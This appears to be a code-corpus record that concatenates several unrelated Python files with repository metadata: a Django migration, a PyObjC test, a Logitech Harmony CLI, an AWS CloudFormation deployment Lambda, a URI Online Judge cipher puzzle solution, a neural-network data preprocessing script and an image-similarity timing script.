2015-05-25T17:44:50.000Z
|
2020-12-05T14:48:53.000Z
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
]
operations = [
migrations.CreateModel(
name='CustomUser',
fields=[
('id', models.AutoField(serialize=False, verbose_name='ID', auto_created=True, primary_key=True)),
('password', models.CharField(verbose_name='password', max_length=128)),
('last_login', models.DateTimeField(verbose_name='last login', null=True, blank=True)),
('identifier', models.CharField(unique=True, max_length=40)),
],
options={
'abstract': False,
},
),
]
| 29.576923 | 114 | 0.574772 | 660 | 0.858257 | 0 | 0 | 0 | 0 | 0 | 0 | 109 | 0.141743 |
7b0e27fa7adc3752fa6c840a8e64f5d20d45801c
| 370 |
py
|
Python
|
PyObjCTest/test_nsmachport.py
|
Khan/pyobjc-framework-Cocoa
|
f8b015ea2a72d8d78be6084fb12925c4785b8f1f
|
[
"MIT"
] | 132 |
2015-01-01T10:02:42.000Z
|
2022-03-09T12:51:01.000Z
|
mac/pyobjc-framework-Cocoa/PyObjCTest/test_nsmachport.py
|
mba811/music-player
|
7998986b34cfda2244ef622adefb839331b81a81
|
[
"BSD-2-Clause"
] | 6 |
2015-01-06T08:23:19.000Z
|
2019-03-14T12:22:06.000Z
|
mac/pyobjc-framework-Cocoa/PyObjCTest/test_nsmachport.py
|
mba811/music-player
|
7998986b34cfda2244ef622adefb839331b81a81
|
[
"BSD-2-Clause"
] | 27 |
2015-02-23T11:51:43.000Z
|
2022-03-07T02:34:18.000Z
|
from PyObjCTools.TestSupport import *
import objc
import Foundation
if hasattr(Foundation, 'NSMachPort'):
class TestNSMachPort(TestCase):
def testAlloc(self):
obj = Foundation.NSMachPort.alloc()
self.assertIsNot(obj, None)
obj = obj.init()
self.assertIsNot(obj, None)
if __name__ == '__main__':
    main()
| 23.125 | 47 | 0.632432 | 218 | 0.589189 | 0 | 0 | 0 | 0 | 0 | 0 | 22 | 0.059459 |
7b13d630c689e01a72a9bc979b93bb26fb000d70
| 7,125 |
py
|
Python
|
harmony.py
|
cyrushadavi/home_automation
|
dcf1dcc688b5021a0c16e68e372e38a28d819f3d
|
[
"MIT"
] | null | null | null |
harmony.py
|
cyrushadavi/home_automation
|
dcf1dcc688b5021a0c16e68e372e38a28d819f3d
|
[
"MIT"
] | null | null | null |
harmony.py
|
cyrushadavi/home_automation
|
dcf1dcc688b5021a0c16e68e372e38a28d819f3d
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python2
"""Command line utility for querying the Logitech Harmony."""
import argparse
import logging
import json
import sys
import auth
import client as harmony_client
LOGGER = logging.getLogger(__name__)
def login_to_logitech(args):
"""Logs in to the Logitech service.
Args:
args: argparse arguments needed to login.
Returns:
Session token that can be used to log in to the Harmony device.
"""
token = auth.login(args.email, args.password)
if not token:
sys.exit('Could not get token from Logitech server.')
session_token = auth.swap_auth_token(
args.harmony_ip, args.harmony_port, token)
if not session_token:
sys.exit('Could not swap login token for session token.')
return session_token
def pprint(obj):
"""Pretty JSON dump of an object."""
print(json.dumps(obj, sort_keys=True, indent=4, separators=(',', ': ')))
def get_client(args):
"""Connect to the Harmony and return a Client instance."""
token = login_to_logitech(args)
client = harmony_client.create_and_connect_client(
args.harmony_ip, args.harmony_port, token)
return client
def show_config(args):
"""Connects to the Harmony and prints its configuration."""
client = get_client(args)
pprint(client.get_config())
client.disconnect(send_close=True)
return 0
def show_current_activity(args):
"""Connects to the Harmony and prints the current activity block
from the config."""
client = get_client(args)
config = client.get_config()
current_activity_id = client.get_current_activity()
activity = [x for x in config['activity'] if int(x['id']) == current_activity_id][0]
pprint(activity)
client.disconnect(send_close=True)
return 0
def sync(args):
"""Connects to the Harmony and syncs it.
"""
client = get_client(args)
client.sync()
client.disconnect(send_close=True)
return 0
def turn_off(args):
"""Sends a 'turn off' command to the harmony, which is the activity
'-1'."""
args.activity = '-1'
start_activity(args)
def start_activity(args):
"""Connects to the Harmony and switches to a different activity,
specified as an id or label."""
client = get_client(args)
config = client.get_config()
    print(args)
activity_off = False
activity_numeric = False
activity_id = None
activity_label = None
try:
activity_off = float(args.activity) == -1
activity_id = int(float(args.activity))
activity_numeric = True
except ValueError:
activity_off = args.activity.lower() == 'turn off'
activity_label = str(args.activity)
if activity_off:
activity = [{'id': -1, 'label': 'Turn Off'}]
else:
activity = [x for x in config['activity']
if (activity_numeric and int(x['id']) == activity_id)
or x['label'].lower() == activity_label
]
if not activity:
LOGGER.error('could not find activity: ' + args.activity)
client.disconnect(send_close=True)
return 1
activity = activity[0]
client.start_activity(int(activity['id']))
LOGGER.info("started activity: '%s' of id: '%s'" % (activity['label'], activity['id']))
client.disconnect(send_close=True)
return 0
def send_command(args):
"""Connects to the Harmony and send a simple command."""
client = get_client(args)
config = client.get_config()
device = args.device if args.device_id is None else args.device_id
device_numeric = None
try:
device_numeric = int(float(device))
except ValueError:
pass
device_config = [x for x in config['device'] if device.lower() == x['label'].lower() or
((device_numeric is not None) and device_numeric == int(x['id']))]
if not device_config:
LOGGER.error('could not find device: ' + device)
client.disconnect(send_close=True)
return 1
device_id = int(device_config[0]['id'])
client.send_command(device_id, args.command)
client.disconnect(send_close=True)
return 0
def main():
"""Main method for the script."""
parser = argparse.ArgumentParser(
description='pyharmony utility script',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
# Required flags go here.
required_flags = parser.add_argument_group('required arguments')
required_flags.add_argument('--email', required=True, help=(
'Logitech username in the form of an email address.'))
required_flags.add_argument(
'--password', required=True, help='Logitech password.')
required_flags.add_argument(
'--harmony_ip', required=True, help='IP Address of the Harmony device.')
# Flags with defaults go here.
parser.add_argument('--harmony_port', default=5222, type=int, help=(
'Network port that the Harmony is listening on.'))
loglevels = dict((logging.getLevelName(level), level)
for level in [10, 20, 30, 40, 50])
parser.add_argument('--loglevel', default='INFO', choices=loglevels.keys(),
help='Logging level to print to the console.')
subparsers = parser.add_subparsers()
show_config_parser = subparsers.add_parser(
'show_config', help='Print the Harmony device configuration.')
show_config_parser.set_defaults(func=show_config)
show_activity_parser = subparsers.add_parser(
'show_current_activity', help='Print the current activity config.')
show_activity_parser.set_defaults(func=show_current_activity)
start_activity_parser = subparsers.add_parser(
'start_activity', help='Switch to a different activity.')
start_activity_parser.add_argument(
'activity', help='Activity to switch to, id or label.')
start_activity_parser.set_defaults(func=start_activity)
sync_parser = subparsers.add_parser(
'sync', help='Sync the harmony.')
sync_parser.set_defaults(func=sync)
turn_off_parser = subparsers.add_parser(
'turn_off', help='Send a turn off command to the harmony.')
turn_off_parser.set_defaults(func=turn_off)
command_parser = subparsers.add_parser(
'send_command', help='Send a simple command.')
command_parser.add_argument('--command',
help='IR Command to send to the device.', required=True)
device_arg_group = command_parser.add_mutually_exclusive_group(required=True)
device_arg_group.add_argument('--device_id',
help='Specify the device id to which we will send the command.')
device_arg_group.add_argument('--device',
help='Specify the device id or label to which we will send the command.')
command_parser.set_defaults(func=send_command)
args = parser.parse_args()
logging.basicConfig(
level=loglevels[args.loglevel],
format='%(levelname)s:\t%(name)s\t%(message)s')
sys.exit(args.func(args))
if __name__ == '__main__':
main()
| 29.442149 | 107 | 0.663719 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,051 | 0.28786 |
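harmony.py wires each subcommand to a handler via set_defaults(func=...) and then dispatches with args.func(args). A standalone Python 3 toy of that dispatch pattern (the command name here is made up for illustration):

import argparse

parser = argparse.ArgumentParser(description='subcommand dispatch demo')
subparsers = parser.add_subparsers(dest='cmd')
show = subparsers.add_parser('show_config')
show.set_defaults(func=lambda args: print('showing config'))

args = parser.parse_args(['show_config'])
args.func(args)  # prints: showing config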
7b15f666dd8b6c5e2030f1efa5c2aa16458ac78c
| 14,567 |
py
|
Python
|
workshop/static/Reliability/300_Testing_for_Resiliency_of_EC2_RDS_and_S3/Code/Python/WebAppLambda/deploy_web_lambda.py
|
sykang808/aws-well-architected-labs-kor
|
da021a9f7501088f871b08560673deac4488eef4
|
[
"Apache-2.0"
] | null | null | null |
workshop/static/Reliability/300_Testing_for_Resiliency_of_EC2_RDS_and_S3/Code/Python/WebAppLambda/deploy_web_lambda.py
|
sykang808/aws-well-architected-labs-kor
|
da021a9f7501088f871b08560673deac4488eef4
|
[
"Apache-2.0"
] | null | null | null |
workshop/static/Reliability/300_Testing_for_Resiliency_of_EC2_RDS_and_S3/Code/Python/WebAppLambda/deploy_web_lambda.py
|
sykang808/aws-well-architected-labs-kor
|
da021a9f7501088f871b08560673deac4488eef4
|
[
"Apache-2.0"
] | null | null | null |
#
# MIT No Attribution
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this
# software and associated documentation files (the "Software"), to deal in the Software
# without restriction, including without limitation the rights to use, copy, modify,
# merge, publish, distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
# INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A
# PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
from __future__ import print_function
from botocore.exceptions import ClientError
import os
import sys
import logging
import traceback
import boto3
import json
LOG_LEVELS = {'CRITICAL': 50, 'ERROR': 40, 'WARNING': 30, 'INFO': 20, 'DEBUG': 10}
stackname = 'WebServersForResiliencyTesting'
AWS_REGION = 'us-east-2'
ARCH_TO_AMI_NAME_PATTERN = {
# Architecture: (pattern, owner)
"PV64": ("amzn2-ami-pv*.x86_64-ebs", "amazon"),
"HVM64": ("amzn2-ami-hvm-*-x86_64-gp2", "amazon"),
"HVMG2": ("amzn2-ami-graphics-hvm-*x86_64-ebs*", "679593333241")
}
def init_logging():
# Setup loggin because debugging with print can get ugly.
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
logging.getLogger("boto3").setLevel(logging.WARNING)
logging.getLogger('botocore').setLevel(logging.WARNING)
logging.getLogger('nose').setLevel(logging.WARNING)
return logger
def setup_local_logging(logger, log_level='INFO'):
# Set the Logger so if running locally, it will print out to the main screen.
handler = logging.StreamHandler()
formatter = logging.Formatter(
'%(asctime)s %(name)-12s %(levelname)-8s %(message)s'
)
handler.setFormatter(formatter)
logger.addHandler(handler)
if log_level in LOG_LEVELS:
logger.setLevel(LOG_LEVELS[log_level])
else:
logger.setLevel(LOG_LEVELS['INFO'])
return logger
def set_log_level(logger, log_level='INFO'):
# There is some stuff that needs to go here.
if log_level in LOG_LEVELS:
logger.setLevel(LOG_LEVELS[log_level])
else:
logger.setLevel(LOG_LEVELS['INFO'])
return logger
def process_global_vars():
logger.info("Processing variables from environment.")
try:
global stackname
stackname = 'WebServersForResiliencyTesting'
except SystemExit:
sys.exit(1)
except Exception:
logger.error("Unexpected error!\n Stack Trace:", traceback.format_exc())
def find_latest_ami_name(region, arch):
assert region, "Region is not defined"
assert arch, "Architecture is not defined"
assert arch in ARCH_TO_AMI_NAME_PATTERN, \
"Architecture must be one of {}".format(
ARCH_TO_AMI_NAME_PATTERN.keys())
pattern, owner = ARCH_TO_AMI_NAME_PATTERN[arch]
ec2 = boto3.client("ec2", region_name=region)
images = ec2.describe_images(
Filters=[dict(
Name="name",
Values=[pattern]
)],
Owners=[owner]
).get("Images", [])
assert images, "No images were found"
sorted_images = sorted(
images,
key=lambda image: image["CreationDate"],
reverse=True
)
latest_image = sorted_images[0]
return latest_image["ImageId"]
def find_in_outputs(outputs, key_to_find):
output_string = None
for output in outputs:
if (output['OutputKey'] == key_to_find):
output_string = output['OutputValue']
break
return output_string
def get_password_from_ssm(parameter_name, region):
client = boto3.client('ssm', region_name=region)
logger.debug("Getting pwd from SSM parameter store.")
value = client.get_parameter(
Name=parameter_name,
WithDecryption=True
)
return value['Parameter']['Value']
def deploy_web_servers(event):
logger.debug("Running function deploy_web_servers")
try:
region = event['region_name']
cfn_region = event['cfn_region']
bucket = event['cfn_bucket']
key_prefix = event['folder']
except Exception:
region = os.environ.get('AWS_REGION', AWS_REGION)
cfn_region = os.environ.get('AWS_REGION', AWS_REGION)
bucket = "arc327-well-architected-for-reliability",
key_prefix = "/"
# Create CloudFormation client
client = boto3.client('cloudformation', region)
# Get the S3 bucket the boot script is in, and the object to retrieve and the image to display
boot_bucket = event['boot_bucket']
boot_prefix = event['boot_prefix']
if 'boot_object' in event:
boot_object = event['boot_object']
else:
boot_object = None
websiteimage = event['websiteimage']
# Get the outputs of the VPC stack
vpc_stack = event['vpc']['stackname']
try:
stack_response = client.describe_stacks(StackName=vpc_stack)
stack_list = stack_response['Stacks']
if (len(stack_list) < 1):
logger.debug("Cannot find stack named " + vpc_stack + ", so cannot parse outputs as inputs")
sys.exit(1)
except Exception:
logger.debug("Cannot find stack named " + vpc_stack + ", so cannot parse outputs as inputs")
sys.exit(1)
vpc_outputs = stack_list[0]['Outputs']
try:
workshop_name = event['workshop']
except Exception:
logger.debug("Unexpected error!\n Stack Trace:", traceback.format_exc())
workshop_name = 'UnknownWorkshop'
# Create the list of subnets to pass
igw_subnets = find_in_outputs(vpc_outputs, 'IGWSubnets')
private_subnets = find_in_outputs(vpc_outputs, 'PrivateSubnets')
# Get the VPC
vpcid = find_in_outputs(vpc_outputs, 'VPC')
# Get the list of security groups to pass
elb_sg = find_in_outputs(vpc_outputs, 'WebELBSecurityGroup')
web_sg = find_in_outputs(vpc_outputs, 'WebSecurityGroup')
bastion_sg = find_in_outputs(vpc_outputs, 'BastionSecurityGroup')
webserver_sg_list = web_sg + ',' + bastion_sg
# Run in zones a, b, and c
azs = region + "a," + region + "b," + region + "c"
# Get the latest AMI
latest_ami = find_latest_ami_name(region, "HVM64")
# Get the outputs of the RDS stack
rds_stack = event['rds']['stackname']
try:
stack_response = client.describe_stacks(StackName=rds_stack)
stack_list = stack_response['Stacks']
if (len(stack_list) < 1):
logger.debug("Cannot find stack named " + rds_stack + ", so cannot parse outputs as inputs")
sys.exit(1)
except Exception:
logger.debug("Cannot find stack named " + rds_stack + ", so cannot parse outputs as inputs")
sys.exit(1)
try:
workshop_name = event['workshop']
except Exception:
workshop_name = 'UnknownWorkshop'
rds_outputs = stack_list[0]['Outputs']
# Get the hostname of the RDS host
rds_host = find_in_outputs(rds_outputs, 'DBAddress')
rds_password = get_password_from_ssm(workshop_name, region)
# Prepare the stack parameters
webserver_parameters = []
webserver_parameters.append({'ParameterKey': 'VPCID', 'ParameterValue': vpcid, 'UsePreviousValue': True})
webserver_parameters.append({'ParameterKey': 'WebServerSecurityGroups', 'ParameterValue': webserver_sg_list, 'UsePreviousValue': True})
webserver_parameters.append({'ParameterKey': 'WebLoadBalancerSG', 'ParameterValue': elb_sg, 'UsePreviousValue': True})
webserver_parameters.append({'ParameterKey': 'WebLoadBalancerSubnets', 'ParameterValue': igw_subnets, 'UsePreviousValue': True})
webserver_parameters.append({'ParameterKey': 'WebServerSubnets', 'ParameterValue': private_subnets, 'UsePreviousValue': True})
webserver_parameters.append({'ParameterKey': 'WebServerInstanceType', 'ParameterValue': 't2.micro', 'UsePreviousValue': True})
webserver_parameters.append({'ParameterKey': 'WebServerAMI', 'ParameterValue': latest_ami, 'UsePreviousValue': False})
webserver_parameters.append({'ParameterKey': 'AvailabilityZones', 'ParameterValue': azs, 'UsePreviousValue': True})
webserver_parameters.append({'ParameterKey': 'BootBucketRegion', 'ParameterValue': cfn_region, 'UsePreviousValue': True})
webserver_parameters.append({'ParameterKey': 'BootBucket', 'ParameterValue': boot_bucket, 'UsePreviousValue': True})
webserver_parameters.append({'ParameterKey': 'BootPrefix', 'ParameterValue': boot_prefix, 'UsePreviousValue': True})
webserver_parameters.append({'ParameterKey': 'WebSiteImage', 'ParameterValue': websiteimage, 'UsePreviousValue': True})
webserver_parameters.append({'ParameterKey': 'RDSHostName', 'ParameterValue': rds_host, 'UsePreviousValue': True})
webserver_parameters.append({'ParameterKey': 'RDSUser', 'ParameterValue': 'admin', 'UsePreviousValue': True})
webserver_parameters.append({'ParameterKey': 'RDSPassword', 'ParameterValue': rds_password, 'UsePreviousValue': False})
# If Boot Object is supplied then use it, otherwise CloudFormation template will use Parameter default
if boot_object is not None:
webserver_parameters.append({'ParameterKey': 'BootObject', 'ParameterValue': boot_object, 'UsePreviousValue': True})
stack_tags = []
stack_tags.append({'Key': 'Workshop', 'Value': 'AWSWellArchitectedReliability' + workshop_name})
capabilities = []
capabilities.append('CAPABILITY_NAMED_IAM')
web_template_s3_url = "https://s3." + cfn_region + ".amazonaws.com/" + bucket + "/" + key_prefix + "web_server_autoscaling.json"
client.create_stack(
StackName=stackname,
TemplateURL=web_template_s3_url,
Parameters=webserver_parameters,
DisableRollback=False,
TimeoutInMinutes=10,
Capabilities=capabilities,
Tags=stack_tags
)
return_dict = {'stackname': stackname}
return return_dict
def check_stack(region, stack_name):
# Create CloudFormation client
logger.debug("Running function check_stack in region " + region)
logger.debug("Running function check_stack on stack " + stack_name)
client = boto3.client('cloudformation', region)
# See if you can retrieve the stack
try:
stack_response = client.describe_stacks(StackName=stack_name)
stack_list = stack_response['Stacks']
if (len(stack_list) < 1):
logger.debug("No Stack named " + stack_name)
return False
logger.debug("Found stack named " + stack_name)
logger.debug("Status: " + stack_list[0]['StackStatus'])
return True
except ClientError as e:
# If the exception is that it doesn't exist, then check the client error before returning a value
if (e.response['Error']['Code'] == 'ValidationError'):
return False
else:
logger.debug("Stack will not be created: Unexpected exception found looking for stack named " + stack_name)
logger.debug("Client error:" + str(e.response))
return True
except Exception:
logger.debug("Stack will not be created: Unexpected exception found looking for stack named " + stack_name)
print("Stack Trace:", traceback.format_exc())
return True
def status_complete(status):
return status == 'UPDATE_COMPLETE' or status == 'CREATE_COMPLETE' or status == 'UPDATE_ROLLBACK_COMPLETE'
def lambda_handler(event, context):
try:
global logger
logger = init_logging()
logger = set_log_level(logger, os.environ.get('log_level', event['log_level']))
logger.debug("Running function lambda_handler")
logger.info('event:')
logger.info(json.dumps(event))
if (context != 0):
logger.info('context.log_stream_name:' + context.log_stream_name)
logger.info('context.log_group_name:' + context.log_group_name)
logger.info('context.aws_request_id:' + context.aws_request_id)
else:
logger.info("No Context Object!")
process_global_vars()
# Check to see if the previous stack was actually created
vpc_stack_status = event['vpc']['status']
if (status_complete(vpc_stack_status)):
rds_stack_status = event['rds']['status']
if (status_complete(rds_stack_status)):
if not check_stack(event['region_name'], stackname):
logger.debug("Stack " + stackname + " doesn't exist; creating")
return deploy_web_servers(event)
else:
logger.debug("Stack " + stackname + " exists")
return_dict = {'stackname': stackname}
return return_dict
else:
logger.debug("RDS Stack was not completely created: status = " + rds_stack_status)
sys.exit(1)
else:
logger.debug("VPC Stack was not completely created: status = " + vpc_stack_status)
sys.exit(1)
except SystemExit:
logger.error("Exiting")
sys.exit(1)
except ValueError:
exit(1)
except Exception:
print("Unexpected error!\n Stack Trace:", traceback.format_exc())
exit(0)
if __name__ == "__main__":
logger = init_logging()
event = {
'vpc': {
'stackname': 'ResiliencyVPC',
'status': 'CREATE_COMPLETE'
},
'rds': {
'stackname': 'MySQLforResiliencyTesting',
'status': 'CREATE_COMPLETE'
},
'log_level': 'DEBUG',
'region_name': 'ap-northeast-2',
'cfn_region': 'us-east-2',
'cfn_bucket': 'aws-well-architected-labs-ohio',
'folder': 'Reliability/',
'boot_bucket': 'aws-well-architected-labs-ohio',
'boot_prefix': 'Reliability/',
'boot_object': 'bootstrapARC327.sh',
'websiteimage': 'https://s3.us-east-2.amazonaws.com/arc327-well-architected-for-reliability/Cirque_of_the_Towers.jpg',
'workshop': 'LondonSummit'
}
os.environ['log_level'] = os.environ.get('log_level', event['log_level'])
logger = setup_local_logging(logger, os.environ['log_level'])
# Add default level of debug for local execution
lambda_handler(event, 0)
| 39.800546 | 139 | 0.674126 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 5,878 | 0.403515 |
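find_latest_ami_name above picks the newest image by sorting on the CreationDate string in reverse. The same selection logic on hand-written image dicts, so it can be checked without any AWS calls (the values are made up):

images = [
    {"ImageId": "ami-old", "CreationDate": "2020-01-01T00:00:00.000Z"},
    {"ImageId": "ami-new", "CreationDate": "2021-06-01T00:00:00.000Z"},
]
latest = sorted(images, key=lambda image: image["CreationDate"], reverse=True)[0]
print(latest["ImageId"])  # ami-new (ISO-8601 strings sort chronologically)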
7b16d187420b13711f7fff210fdd319f14807224
| 483 |
py
|
Python
|
URI/1024.py
|
leilaapsilva/BabySteps
|
32b1e6439fa3be49c93a3cae0b4fbd0f03a713be
|
[
"MIT"
] | 37 |
2020-10-01T03:50:42.000Z
|
2021-11-23T00:49:51.000Z
|
URI/1024.py
|
leilaapsilva/BabySteps
|
32b1e6439fa3be49c93a3cae0b4fbd0f03a713be
|
[
"MIT"
] | 27 |
2020-10-03T23:16:13.000Z
|
2021-11-19T19:53:01.000Z
|
URI/1024.py
|
leilaapsilva/BabySteps
|
32b1e6439fa3be49c93a3cae0b4fbd0f03a713be
|
[
"MIT"
] | 97 |
2020-10-01T11:39:01.000Z
|
2021-11-01T00:30:53.000Z
|
alpha = "abcdefghijklmnopqrstuvwxyz"
n = int(raw_input())
for i in xrange(n):
word = raw_input()
aux_word = ""
first_part = ""
second_part = ""
for j in xrange(len(word)-1, -1, -1):
if(word[j].lower() in alpha):
aux_word += chr(ord(word[j]) + 3)
else:
aux_word += word[j]
middle = (len(word)/2)
first_part = aux_word[0:middle]
for k in xrange((len(aux_word)/2), len(aux_word)):
second_part += chr(ord(aux_word[k]) -1)
print first_part + second_part
| 21 | 51 | 0.6294 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 34 | 0.070393 |
7b17163e98fca69e6d9d2a2ecd44f5b5e78cfd5c
| 6,095 |
py
|
Python
|
Coursework 2/nn_preprocess.py
|
martinferianc/Pattern-Recognition-EIE4
|
412d437582b236dadd81c0621935f6b3bd5dbad5
|
[
"MIT"
] | 1 |
2019-08-20T11:17:56.000Z
|
2019-08-20T11:17:56.000Z
|
Coursework 2/nn_preprocess.py
|
martinferianc/Pattern-Recognition-EIE4
|
412d437582b236dadd81c0621935f6b3bd5dbad5
|
[
"MIT"
] | null | null | null |
Coursework 2/nn_preprocess.py
|
martinferianc/Pattern-Recognition-EIE4
|
412d437582b236dadd81c0621935f6b3bd5dbad5
|
[
"MIT"
] | null | null | null |
import numpy as np
# For file manipulation and locating
import os
# For the progress bar
from tqdm import tqdm
# To create a deep copy of the data
import copy
# To load the pre-processed and split data
from pre_process import load_data as ld
# For normalization of the samples
from sklearn.preprocessing import normalize
# We define some constant that we reuse
PROCESSED_DIR = "data/processed/"
def save_data(data, file_path, name):
"""
Saves the data
given the name and
the file path
Parameters
----------
data: numpy matrix
Data matrix with features
file_path: str
File path where the file should be saved
name: str
Specific name of the given file
"""
np.save(file_path + "{}.npy".format(name),data)
def preprocess(X, Y, size = 100000,lower_bound=0, upper_bound = 7368,samples = 10, same_class=0.4, different = 0.5, penalty = 10, same_class_penalty=1):
"""
    Preprocesses the dataset into training pairs.
    It creates two lists X, Y: it randomly chooses a sample from the input
    list, and that sample is repeated `samples` times in total.
    For each repeated sample it pairs a portion of
    images corresponding to different labels,
    a portion of images corresponding to the same class, and
    a remaining portion of identities (the sample paired with itself);
    based on the class membership, a penalty is applied or not.
Parameters
----------
X: numpy array of features
Numpy array of features from which the pairs are created
Y: numpy array
Numpy array of corresponding labels
Returns
-------
X_selected: numpy array
Numpy array of the first input in the pairs
Y_selected: numpy array
Numpy array of the second input in the pairs
values: numpy array
Artificially determined distances
"""
X = normalize(X, axis=1)
N,F = X.shape
X_selected = []
Y_selected = []
values = []
C = int(samples*same_class)
D = int(samples*different)
selected_i = []
for i in tqdm(range(int(size/samples))):
# Randomly select a sample but do not repeat it with respect ot previous samples
random_i = np.random.randint(lower_bound,upper_bound)
while random_i in selected_i:
random_i = np.random.randint(lower_bound,upper_bound)
selected_i.append(random_i)
C_counter = 0
D_counter = 0
offset = 0
# Add samples which correspond to different label than the original image
selected_j = []
while D_counter<D:
random_j = np.random.randint(lower_bound,upper_bound)
while random_j in selected_j:
random_j = np.random.randint(lower_bound,upper_bound)
if Y[random_i] != Y[random_j]:
D_counter+=1
offset+=1
X_selected.append(copy.deepcopy(X[random_i]))
Y_selected.append(copy.deepcopy(X[random_j]))
values.append(penalty)
selected_j.append(random_j)
# Add samples which correspond to the same class
selected_j = []
while C_counter<C:
low = 0
high = N
if random_i-10>lower_bound:
low = random_i-10
if random_i+10<upper_bound:
high = random_i+10
random_j = np.random.randint(lower_bound,upper_bound)
while random_j in selected_j:
random_j = np.random.randint(lower_bound,upper_bound)
if Y[random_i] == Y[random_j] and random_i!=random_j:
C_counter+=1
offset +=1
X_selected.append(copy.deepcopy(X[random_i]))
Y_selected.append(copy.deepcopy(X[random_j]))
values.append(same_class_penalty)
selected_j.append(random_j)
# Fill in the rest with identities
while offset < samples:
X_selected.append(copy.deepcopy(X[random_i]))
Y_selected.append(copy.deepcopy(X[random_i]))
offset+=1
values.append(0)
indeces = np.random.choice(size, size=size, replace=False)
X_selected = np.array(X_selected)
Y_selected = np.array(Y_selected)
values = np.array(values)
return [X_selected[indeces], Y_selected[indeces], values[indeces]]
def load_data(retrain=False):
"""
Load the cached data or call preprocess()
to generate new data
Parameters
----------
None
Returns
-------
all_data: list
* All the data split into lists of [features, labels]
"""
all_data = ld(False)
training_data = all_data[0]
Y = training_data[1]
X = training_data[0]
if retrain is True:
print("Generating new data...")
X_train, Y_train, values_train = preprocess(X,Y, 40000, 0, 6379,samples = 10, same_class=0.4, different = 0.5, penalty = 1,same_class_penalty=0)
X_validation, Y_validation, values_validation = preprocess(X,Y, 7500, 6380,samples = 10, same_class=0.2, different = 0.7, penalty = 1, same_class_penalty=0)
save_data(X_train,PROCESSED_DIR,"training_nn_X")
save_data(Y_train,PROCESSED_DIR,"training_nn_Y")
save_data(values_train,PROCESSED_DIR,"training_nn_values")
save_data(X_validation,PROCESSED_DIR,"validation_nn_X")
save_data(Y_validation,PROCESSED_DIR,"validation_nn_Y")
save_data(values_validation,PROCESSED_DIR,"validation_nn_values")
return [X_train, Y_train, values_train, X_validation, Y_validation, values_validation]
else:
print("Loading data...")
data = []
data.append(np.load(PROCESSED_DIR + "training_nn_X.npy"))
data.append(np.load(PROCESSED_DIR + "training_nn_Y.npy"))
data.append(np.load(PROCESSED_DIR + "training_nn_values.npy"))
data.append(np.load(PROCESSED_DIR + "validation_nn_X.npy"))
data.append(np.load(PROCESSED_DIR + "validation_nn_Y.npy"))
data.append(np.load(PROCESSED_DIR + "validation_nn_values.npy"))
return data
if __name__ == '__main__':
load_data(retrain=True)
| 33.674033 | 164 | 0.642986 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,136 | 0.350451 |
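At the end of preprocess() above, a single random permutation indexes X_selected, Y_selected and values so that each pair stays aligned with its target distance. A tiny standalone illustration of that trick (arrays here are arbitrary toy data):

import numpy as np

X_sel = np.arange(10).reshape(5, 2)
Y_sel = np.arange(10, 20).reshape(5, 2)
values = np.array([0, 1, 0, 1, 0])

idx = np.random.choice(5, size=5, replace=False)  # one permutation for all three
print(X_sel[idx][0], Y_sel[idx][0], values[idx][0])  # rows remain paired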
7b180f7965af3a7127ae86b77bf7384badafe436
| 776 |
py
|
Python
|
src/main.py
|
M10han/image-scores
|
509e2e9f9d3a484631a97a2e025849c266f71c43
|
[
"MIT"
] | null | null | null |
src/main.py
|
M10han/image-scores
|
509e2e9f9d3a484631a97a2e025849c266f71c43
|
[
"MIT"
] | 1 |
2021-06-08T21:41:19.000Z
|
2021-06-08T21:41:19.000Z
|
src/main.py
|
M10han/image-scores
|
509e2e9f9d3a484631a97a2e025849c266f71c43
|
[
"MIT"
] | null | null | null |
import pandas as pd
import time
from image_matcher import read_image, bjorn_score
def main(data_location='../data/', data_file='input.csv'):
df = pd.read_csv(data_location + data_file)
score_list, runtime_list = [], []
for idx, row in df.iterrows():
image1_file, image2_file = data_location + \
row.image1, data_location + row.image2
image1 = read_image(image1_file)
image2 = read_image(image2_file)
start = time.time()
score = bjorn_score(image1, image2)
end = time.time()
score_list.append(score)
runtime_list.append(f"{end-start:9f}")
df['similar'] = score_list
df['elapsed'] = runtime_list
df.to_csv('output.csv', index=False)
if __name__ == "__main__":
main()
| 26.758621 | 58 | 0.643041 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 78 | 0.100515 |
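main() above times each image pair and appends the score and elapsed time as new dataframe columns. A toy version of that per-row pattern with a dummy scoring value in place of bjorn_score (purely illustrative):

import time
import pandas as pd

df = pd.DataFrame({'image1': ['a.png', 'b.png'], 'image2': ['c.png', 'd.png']})
scores, runtimes = [], []
for _, row in df.iterrows():
    start = time.time()
    score = 0.5  # stand-in for bjorn_score(image1, image2)
    runtimes.append(f"{time.time() - start:.6f}")
    scores.append(score)
df['similar'] = scores
df['elapsed'] = runtimes
print(df)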
7b1892266415333934744e874665f21d627beb7f
| 2,006 |
py
|
Python
|
build/lib.linux-x86_64-2.7/biograder/Encryptor.py
|
PayneLab/GenericDataAPI
|
9469328c4f845fbf8d97b5d80ad2077c9f927022
|
[
"MIT"
] | 2 |
2021-04-25T18:36:29.000Z
|
2021-05-14T15:34:59.000Z
|
build/lib.linux-x86_64-2.7/biograder/Encryptor.py
|
PayneLab/GenericDataAPI
|
9469328c4f845fbf8d97b5d80ad2077c9f927022
|
[
"MIT"
